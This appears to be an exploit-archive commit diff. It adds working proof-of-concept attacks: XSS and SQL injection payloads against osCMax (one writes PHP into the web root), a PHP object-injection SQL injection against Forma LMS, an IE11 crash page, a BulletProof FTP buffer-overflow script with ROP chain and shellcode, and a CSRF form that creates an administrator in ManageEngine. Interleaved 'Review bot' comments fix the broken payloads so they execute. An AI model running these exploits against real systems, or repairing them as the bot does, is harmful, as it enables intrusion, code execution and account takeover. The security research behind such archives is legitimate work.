Encode the input of files to folders and disallow special chars. Implement a whitelist or a exception to prevent unauthorized path value requests via GET method.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5)
1.2
The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as high. (CVSS 5.6)
1.3
The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
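Review bot: Finding 1.2 (`devicename`) is titled a local command injection, but the only evidence given is the device name emitted unescaped inside a `<span>` of the index page, which is stored HTML/script injection in the WiFi web UI rather than execution of system commands, and the proposed fix (encode the value) is an XSS fix; the title and the "unauthorized execution of system specific commands" impact sentence should be reworded to say so. The severity for 1.2 is also self-contradictory: the technical section rates it medium at CVSS 5.6 while the Security Risk section calls the same 5.6 score high. For 1.3 the payloads wrap the `../` run in `%2F%22%3E%3C` … `%3E` (`/"><…>`), which are HTML break-out characters a traversal does not need, and the logged 200 responses do not show any file outside the served directory being returned (the `open` response is a 538-byte PNG whose Last-Modified matches the upload two seconds earlier), so the traversal claim is not demonstrated by the pasted evidence; a request that reads a known file outside the app's document root would settle it. Finding 1.1 likewise looks like a write-side path traversal through the multipart `filename` (leading `../`) rather than a file include, and the fix should be to strip path separators from the filename and resolve the destination against the upload root, not merely to encode it in the listing.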

13
platforms/php/webapps/37038.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/admin/login.php?action=process" method="post" name="main" id="main">
<input type="hidden" name="username" value="'<script>alert(document.cookie);</script>">
<input type="hidden" name="password" value="">
<input type="submit" name="submit" value="Send">
</form>

16
platforms/php/webapps/37039.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/admin/htaccess.php" method="post" name="main" id="main">
<input type="hidden" name="sb_id" value='"><script>alert(1);</script>'>
<input type="hidden" name="sb_key" value='"><script>alert(2);</script>'>
<input type="hidden" name="gc_id" value='"><script>alert(3);</script>'>
<input type="hidden" name="gc_key" value='"><script>alert(4);</script>'>
<input type="hidden" name="path" value='"><script>alert(5);</script>'>
<input type="submit" name="submit" value="Send">
</form>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/xsell.php?search=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

10
platforms/php/webapps/37041.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_products_purchased.php?gross=%22%20%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E
http://www.example.com/admin/stats_products_purchased.php?max=%27%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
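Review bot: Both PoC URLs as rendered here contain a stray space inside the encoded payload — `document.cookie% 29` on the `gross` line and `%3C/s cript%3E` on the `max` line — which splits a percent-escape and the closing `</script>` tag, so pasting them as-is will not reproduce the XSS. Each should end `alert%28document.cookie%29;%3C/script%3E` with no internal whitespace. If the space is a line-wrap artifact inherited from the SecurityFocus source it still needs to be removed before the file is published.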


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
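Review bot: The `status` payload as rendered here has a stray space in `%3C/scr ipt%3E`, which leaves the closing `</script>` tag broken so the injected script is never terminated and the PoC does not fire. The URL should end `;%3C/script%3E` with no whitespace. Whether the space is a wrap artifact from the source or present in the committed file, it should be corrected.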


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_customers.php?sorted=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/information_manager.php?information_action=Edit&information_id=%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/geo_zones.php?action=list&zID=%27%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/new_attributes_include.php?pageTitle=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E


@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/admin/login.php?action=process" method="post" name="main" id="main">
<input type="hidden" name="username" value="',1,2,(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))) -- 2">
<input type="hidden" name="password" value="">
<input type="submit" name="submit" value="Send">
</form>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_monthly_sales.php?status=0 union select '<? php_code ?>' INTO OUTFILE '../../../path/to/site/file.php'

56
platforms/php/webapps/37055.txt Executable file

@ -0,0 +1,56 @@
Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities
[+] Author: Filippo Roncari
[+] Target: Forma LMS
[+] Version: 1.3 and probably lower
[+] Vendor: http://www.formalms.org
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf
[+] Info: f.roncari@securenetwork.it / f@unsec.it
[+] Summary
Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.
[+] Vulnerability Details
Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities.
[+] Technical Details
See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details.
[+] Proof of Concept (PoC)
The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory.
[!] PoC Payload
----------------------------
a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";}
----------------------------
[!] PoC Request
----------------------------
POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1
Host: localhost
Cookie: docebo_session=91853e7eca413578de70304f94a43fe1
Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796
Content-Length: 1453
[...]
-----------------------------1657367614367103261183989796
Content-Disposition: form-data; name="message[recipients]"
a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+ char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst% 3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D
[...]
--------------------------
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.


@ -0,0 +1,55 @@
# Exploit Title: Internet Explorer 11 - Crash PoC
# Google Dork: N/A
# Date: 19th May, 2015
# Exploit Author: garage4hackers
# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246
# Software Link: N/A
# Version: Tested on IE 11
# Tested on: Windows 7
# CVE : N/A
<!doctype html>
<html>
<HEAD><title>case522207.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
content: 'moof';
}
*:nth-child(5)::after {
content:'>>';
}
</style>
</HEAD><body>
<script>
elem0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem1 = document.createElementNS('http://www.w3.org/2000/svg', 'feGaussianBlur')
elem2 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem3 = document.createElement('dd')
elem4 = document.createElement('map')
elem5 = document.createElement('i')
elem6 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
rangeTxt = document.body.createTextRange()
randOldNode = document.documentElement.firstChild
randOldNode.parentNode.replaceChild(elem2, randOldNode)
rangeTxt.moveEnd('sentence', '-20')
</script>
</body></html>
How do I reproduce it?
- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime.
a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full
b) Execute runMe.html in WinDbg
c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10)
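Review bot: The `# Exploit Title …` header lines before `<!doctype html>` and the reproduction notes after `</html>` are bare text inside an HTML file, so a browser renders them as page content and the document is not well-formed; wrap both stretches in `<!-- … -->` so only the markup between them is parsed. The notes also tell the reader to execute `runMe.html` while the document's own `<title>` is `case522207.html` and neither matches the name the file is committed under, so step b) should name the file as committed. `# Vendor Homepage` points to the garage4hackers forum thread rather than the product vendor; keep the thread as a `# Reference:` line and put the vendor's page in that field. The hunk header counts 55 lines but fewer are rendered here, so blank lines were presumably dropped by the page rendering rather than missing from the file.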

119
platforms/windows/local/37056.py Executable file

@ -0,0 +1,119 @@
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#
#!/usr/bin/python
from struct import pack
# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll]
buf += b'A' * 18
buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll]
buf += b'A' * 8
buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll]
buf += b'A' * 10
buf += b'\xce\xc3\x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]
# ROP chain
rop_gadgets = b''
rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501
rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll]
rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll]
rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll]
rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll]
rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll]
rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll]
# heap-only egghunter
hunter = b'\x6a\x30\x5a' # PUSH 30 # POP EDX
hunter += b'\x64\x8b\x12' # MOV EDX, DWORD PTR FS:[EDX]
hunter += b'\x80\xc2\x90' # ADD DL,90
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\xeb\x05' # JMP SHORT
hunter += b'\x66\x81\xca\xff\x0f' # OR DX,0FFF
hunter += b'\x42\x52' # INC EDX # PUSH EDX
hunter += b'\x6a\x02\x58' # PUSH 2 # POP EAX
hunter += b'\xcd\x2e' # INT 2E
hunter += b'\x3c\x05' # CMP AL,5
hunter += b'\x5a' # POP EDX
hunter += b'\x74\xef' # JE SHORT
hunter += b'\xb8\x77\x30\x30\x74' # MOV EAX, w00t
hunter += b'\x89\xd7' # MOV EDI,EDX
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xea' # JNZ SHORT
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xe7' # JNZ SHORT
# copy shellcode back to stack
strcpy = b'\x8b\xec' # MOV EBP,ESP
strcpy += b'\x57\x55\x55' # PUSH EDI # PUSH EBP # PUSH EBP
strcpy += b'\x68\x30\x60\xc4\x77' # PUSH ptr to &strcpy [msvcrt.dll]
strcpy += b'\xc3' # RET
egg = 'w00t'.encode()
# msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe
shellcode = b''
shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31'
shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70'
shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8'
shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91'
shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1'
shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37'
shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e'
shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc'
shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8'
shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73'
shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3'
shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61'
shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b'
shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88'
shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17'
shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4'
shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66'
identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'
host = buf
port = b'21'
name = b'B' + rop_gadgets + hunter + strcpy
password = b'bpfmcidchffddknejf'
local = egg + egg + shellcode
sploit = b"\r\n".join([identifier, host, port, name, password, local])
try:
print('[*] Creating exploit file...')
f = open('sploit.bps', 'wb')
f.write(sploit)
f.close()
print('[*] sploit.bps file successfully created!')
except:
print('[!] Error while creating exploit file!')
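Review bot: The bare `except:` at the bottom of the script catches everything, including KeyboardInterrupt and SystemExit, and prints a fixed message that hides why the write failed; narrow it to `except OSError as exc:` and include `exc` in the error line. The `open`/`write`/`close` sequence leaks the file handle if `write` raises, so replace those three lines with `with open('sploit.bps', 'wb') as f:` followed by `f.write(sploit)`, which closes it on every path. The `#!/usr/bin/python` shebang sits below the banner comment and therefore has no effect; move it to the first line or drop it. The script has no `if __name__ == '__main__':` guard, so merely importing it (for example to inspect the constants) writes `sploit.bps` as a side effect — acceptable for a one-shot script, but worth a one-line comment saying so.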


@ -0,0 +1,39 @@
<!--
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
Request Forgery Exploit
[+] Date: 31/03/2015
[+] Exploit Author: Akash S. Chavan
[+] Vendor Homepage: https://www.manageengine.com/
[+] Software Link:
https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
[+] Version: Version: 10.0, Build Number: 10001
[+] Tested on: Windows 8.1/PostgreSQL
-->
<html>
<body>
<form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
<input type="hidden" name="domainId" value="" />
<input type="hidden" name="roleId" value="" />
<input type="hidden" name="addField" value="true" />
<input type="hidden" name="userType" value="Administrator" />
<input type="hidden" name="userName" value="rooted" />
<input type="hidden" name="pwd1" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="userGroup" value="Administrator" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="AddSubmit" value="Add&#32;User" />
<input type="hidden" name="alpha" value="" />
<input type="hidden" name="userIds" value="" />
<input type="hidden" name="roleName" value="" />
<input type="hidden" name="selDevices" value="" />
<input type="hidden" name="doAction" value="" />
<input type="hidden" name="productName" value="eventlog" />
<input type="hidden" name="licType" value="Prem" />
<input type="hidden" name="next" value="" />
<input type="hidden" name="currentUserId" value="1" />
<input type="hidden" name="isAdminServer" value="false" />
<input type="submit" value="Click Me" />
</form>
</body>
</html>